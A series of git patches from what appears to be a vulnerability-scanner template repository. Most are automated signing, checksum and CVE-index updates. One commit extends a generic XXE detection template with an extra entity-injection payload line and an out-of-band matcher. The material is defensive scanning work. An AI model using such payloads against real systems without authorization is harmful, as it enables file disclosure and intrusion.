a558db64ad61970b831bf82cc1e60717648b6ec3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 07:25:47 +0000 Subject: [PATCH 1548/1841] Auto Template Signing [Tue Jul 23 07:25:47 UTC 2024] :robot: --- http/cves/2024/CVE-2024-40348.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml index 9cfe50f590..ac666a3efa 100644 --- a/http/cves/2024/CVE-2024-40348.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -57,3 +57,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100c128400c428439af0515a4dcba55a151ea17919dc89be9512d17c913f651688b022100f867f890a69f2d0defc36e8eeddd85d923759f1db9f56bafeaffebbd039531cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dd91ad9765118b7407e63af07931faa4b22c650a Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 23 Jul 2024 11:21:35 +0330 Subject: [PATCH 1549/1841] Improve generic-xxe.yaml --- dast/vulnerabilities/xxe/generic-xxe.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index ff5cbd8d9d..54b53b1ee4 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -2,7 +2,7 @@ id: generic-xxe info: name: Generic XML external entity (XXE) - author: pwnhxl + author: pwnhxl, AmirHossein Raeisi severity: medium reference: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py @@ -23,6 +23,7 @@ http: xxe: - ' ]>&{{rletter}};' - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' fuzzing: - part: query @@ -38,7 +39,6 @@ http: - "{{xxe}}" stop-at-first-match: true - matchers-condition: or matchers: - type: regex name: linux @@ -51,4 +51,9 @@ http: part: body words: - 'for 16-bit app support' -# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - type: word + part: interactsh_protocol + words: + - "http" +# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950 From 6d5bff0e2ef56faa511036ec6f372304f4b8b339 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 08:18:18 +0000 Subject: [PATCH 1550/1841] Auto Generated New Template Addition List [Tue Jul 23 08:18:18 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index b0119fca9f..9e9b87143e 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ headless/2024/CVE-2024-38526.yaml http/cnvd/2023/CNVD-2023-72138.yaml http/cves/2022/CVE-2022-38322.yaml http/cves/2022/CVE-2022-45269.yaml +http/cves/2023/CVE-2023-2309.yaml http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-43662.yaml @@ -14,6 +15,7 @@ http/cves/2024/CVE-2024-32238.yaml http/cves/2024/CVE-2024-34257.yaml http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml +http/cves/2024/CVE-2024-40348.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml From 50bf3e75b39ab7d0454a14c4bbd66d983b560900 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 08:18:25 +0000 Subject: [PATCH 1551/1841] Auto Generated Templates Checksum [Tue Jul 23 08:18:25 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 48242fe405..b37d462f5c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3056,6 +3056,7 @@ http/cves/2023/CVE-2023-22527.yaml:f03d7787b1186c69d35db7079c8925f8aa5e07d2 http/cves/2023/CVE-2023-22620.yaml:2aa0bafaecd3b3b8a9583a5cbfdd7e9c1a1cb257 http/cves/2023/CVE-2023-2272.yaml:94a125ff04e62b2d1bda69787e8fd1019a36be42 http/cves/2023/CVE-2023-22897.yaml:b79dbca06ddb56668881397e8ded0c7189a8ca79 +http/cves/2023/CVE-2023-2309.yaml:ea784095e18733873ab1fdfaf14e30f7436da234 http/cves/2023/CVE-2023-23161.yaml:bba84f830ad38a31c2d338fabc553dbc0e1be8b7 http/cves/2023/CVE-2023-23333.yaml:bb8afd05703411ed6fe92a571938a6dc46183f2a http/cves/2023/CVE-2023-23488.yaml:4701ba1c43a8888bef0092585a3666bc4e3809b5 @@ -3498,7 +3499,7 @@ http/cves/2024/CVE-2024-3742.yaml:c14a1c00e621d1d77ddf978af6680fc4b05c3aa1 http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 -http/cves/2024/CVE-2024-40348.yaml:621751d6dddccf70558e2ce83afae2b1af41a249 +http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 @@ -8915,7 +8916,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9c506582978b64b1623e6c9428e3337cd727eee4 +templates-checksum.txt:20ecb33c3023ac44139b6975a6052e802dbaa48f vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 3fdde119354ae2a8249601c2522293bb2fcf4734 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 08:18:32 +0000 Subject: [PATCH 1552/1841] Auto Generated cves.json [Tue Jul 23 08:18:32 UTC 2024] :robot: --- cves.json | 7 +++++-- cves.json-checksum.txt | 2 +- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index f9866e74a8..8a585b2031 100644 --- a/cves.json +++ b/cves.json @@ -396,7 +396,7 @@ {"ID":"CVE-2017-12629","Info":{"Name":"Apache Solr \u003c= 7.1 - XML Entity Injection","Severity":"critical","Description":"Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12629.yaml"} {"ID":"CVE-2017-12635","Info":{"Name":"Apache CouchDB 1.7.0 / 2.x \u003c 2.1.1 - Remote Privilege Escalation","Severity":"critical","Description":"Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12635.yaml"} {"ID":"CVE-2017-12637","Info":{"Name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","Severity":"high","Description":"SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-12637.yaml"} -{"ID":"CVE-2017-12794","Info":{"Name":"Django Debug Page - Cross-Site Scripting","Severity":"medium","Description":"Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with \"DEBUG = True\" is not on by default (which is what makes the page visible).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-12794.yaml"} +{"ID":"CVE-2017-12794","Info":{"Name":"Django Debug Page - Cross-Site Scripting","Severity":"medium","Description":"Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. We detected that right circumstances (DEBUG=True) are present to allow a cross-site scripting attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-12794.yaml"} {"ID":"CVE-2017-14135","Info":{"Name":"OpenDreambox 2.0.0 - Remote Code Execution","Severity":"critical","Description":"OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-14135.yaml"} {"ID":"CVE-2017-14186","Info":{"Name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","Severity":"medium","Description":"FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2017/CVE-2017-14186.yaml"} {"ID":"CVE-2017-14524","Info":{"Name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","Severity":"medium","Description":"OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-14524.yaml"} @@ -1504,7 +1504,7 @@ {"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"} {"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"} {"ID":"CVE-2022-0087","Info":{"Name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","Severity":"medium","Description":"On the login page, there is a \"from=\" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0087.yaml"} -{"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"} +{"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Information Disclosure","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a information disclosure vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"} {"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"} {"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"} {"ID":"CVE-2022-0149","Info":{"Name":"WooCommerce Stored Exporter WordPress Plugin \u003c 2.7.1 - Cross-Site Scripting","Severity":"medium","Description":"The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0149.yaml"} @@ -1855,6 +1855,7 @@ {"ID":"CVE-2022-38131","Info":{"Name":"RStudio Connect - Open Redirect","Severity":"medium","Description":"RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38131.yaml"} {"ID":"CVE-2022-38295","Info":{"Name":"Cuppa CMS v1.0 - Cross Site Scripting","Severity":"medium","Description":"Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38295.yaml"} {"ID":"CVE-2022-38296","Info":{"Name":"Cuppa CMS v1.0 - Arbitrary File Upload","Severity":"critical","Description":"Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-38296.yaml"} +{"ID":"CVE-2022-38322","Info":{"Name":"Temenos Transact - Cross-Site Scripting","Severity":"high","Description":"Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-38322.yaml"} {"ID":"CVE-2022-38463","Info":{"Name":"ServiceNow - Cross-Site Scripting","Severity":"medium","Description":"ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38463.yaml"} {"ID":"CVE-2022-38467","Info":{"Name":"CRM Perks Forms \u003c 1.1.1 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38467.yaml"} {"ID":"CVE-2022-38553","Info":{"Name":"Academy Learning Management System \u003c5.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38553.yaml"} @@ -2039,6 +2040,7 @@ {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} {"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"} {"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"} +{"ID":"CVE-2023-2309","Info":{"Name":"wpForo Forum \u003c= 2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2309.yaml"} {"ID":"CVE-2023-23161","Info":{"Name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-23161.yaml"} {"ID":"CVE-2023-23333","Info":{"Name":"SolarView Compact 6.00 - OS Command Injection","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23333.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"} @@ -2481,6 +2483,7 @@ {"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} +{"ID":"CVE-2024-40348","Info":{"Name":"Bazarr \u003c 1.4.3 - Arbitrary File Read","Severity":"high","Description":"Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-40348.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 532b6b33ee..e919c96898 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -e9319efcb982168a267342cfa06eefb3 +1d9a6b1f068eb3bcfb61ecfb71a484fe From d14ae4536e502f7b6219cd405d81d4b60f2673d7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 08:19:16 +0000 Subject: [PATCH 1553/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c5942a47d5..9000af01d5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cnvd/2023/CNVD-2023-72138.yaml' - 'http/cves/2022/CVE-2022-38322.yaml' - 'http/cves/2022/CVE-2022-45269.yaml' + - 'http/cves/2023/CVE-2023-2309.yaml' - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-43662.yaml' @@ -19,6 +20,7 @@ on: - 'http/cves/2024/CVE-2024-34257.yaml' - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' + - 'http/cves/2024/CVE-2024-40348.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' From c0fa973320565fe0bdb241d9d77ea13aa348c7ea Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 08:20:03 +0000 Subject: [PATCH 1554/1841] Auto Template Signing [Tue Jul 23 08:20:03 UTC 2024] :robot: --- http/cves/2023/CVE-2023-2309.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-2309.yaml b/http/cves/2023/CVE-2023-2309.yaml index 6238fafb89..c04794dc49 100644 --- a/http/cves/2023/CVE-2023-2309.yaml +++ b/http/cves/2023/CVE-2023-2309.yaml @@ -41,3 +41,4 @@ http: - 'contains(header,"text/html")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100d17bcc42a5ea79ddddf6d66a96caf96d0b38ebed2fe57fb3e3ef7ceed3ecea1a02207b0bb211f596bc48a3f20095033e4b7c43497f4e8bc590a62d798270d495f59c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b6827ec7f346ab274bf23fc26822d261c40a60cd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 08:20:18 +0000 Subject: [PATCH 1555/1841] Auto Generated New Template Addition List [Tue Jul 23 08:20:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9e9b87143e..c2bb953500 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-40348.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml +http/cves/2024/CVE-2024-4885.yaml http/cves/2024/CVE-2024-5217.yaml http/cves/2024/CVE-2024-6289.yaml http/cves/2024/CVE-2024-6646.yaml From 3415d62c24f2c6ad1e68a970f80e36685b7c02ef Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 08:20:23 +0000 Subject: [PATCH 1556/1841] Auto Generated Templates Checksum [Tue Jul 23 08:20:23 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b37d462f5c..a61a28f0aa 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:9982e6a78a95ccb7d7429c131d3afc5fb6ba57c4 -cves.json-checksum.txt:0ccb38ecde404c9d7db407e323cbc298bcf083cc +cves.json:932e35a7b832acf213452d63d09965a8f934cefe +cves.json-checksum.txt:b2ffef020db80d91ffe8f5ba3220649514315bff dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3509,6 +3509,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f +http/cves/2024/CVE-2024-4885.yaml:2525c7405cd7c15756f7c1534b5c6947e82cf274 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7 @@ -8916,7 +8917,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:20ecb33c3023ac44139b6975a6052e802dbaa48f +templates-checksum.txt:4d4b09a6102b05852f7c50462f8fa6ce8f16b63f vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 